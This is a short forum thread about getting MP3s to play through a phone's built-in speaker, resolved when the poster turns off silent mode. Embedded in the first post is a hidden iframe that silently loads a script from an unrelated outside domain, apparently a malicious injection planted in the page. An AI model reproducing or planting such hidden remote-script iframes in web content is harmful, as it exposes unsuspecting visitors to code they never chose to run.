Speakerphone for MP3 player

I can't figure out how to listen to MP3's through the builtin speaker. Headphones work fine, but no speakerphone. I have used the speaker for phone conversations, so I am assuming there is a checkbox somewhere that I need to click. Nobody else seems to have had this problem. Any suggestions?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mine played MP3s out of the speaker right out of the box. I don't think there is a special setting you have to select.

Just make sure the phone is not in silent mode. If it is making any sounds, it should be able to play MP3's. If it isn't, call Kyo support, 'cause it is broken...

I guess I'll have to call Tech Support tomorrow, as I haven't been able to get mp3 sound out of the speaker. I hope it's something they can fix software-wise.

And I don't think you even need to turn the "speakerphone" on. If I remember right, you just hit play with no headphones in the jack and make sure that silence mode (for ringer, etc.) isn't on.

It will come through the speakerphone provided the volume is turned up ( >0) and no headphones are plugged in.

Can you use the speakerphone for calls? Does your handset ring (same speaker)?

BTW, even if it did work for you, your not missing much

Umm, it works now. The trick is to *actually* turn silent mode off of the phone ringer, not just push volume buttons without actually turning it off. :blush2

Thanks for your suggestions, though. I'm sure if there had been an actual malfunction, they would have come in handy. :eyesroll
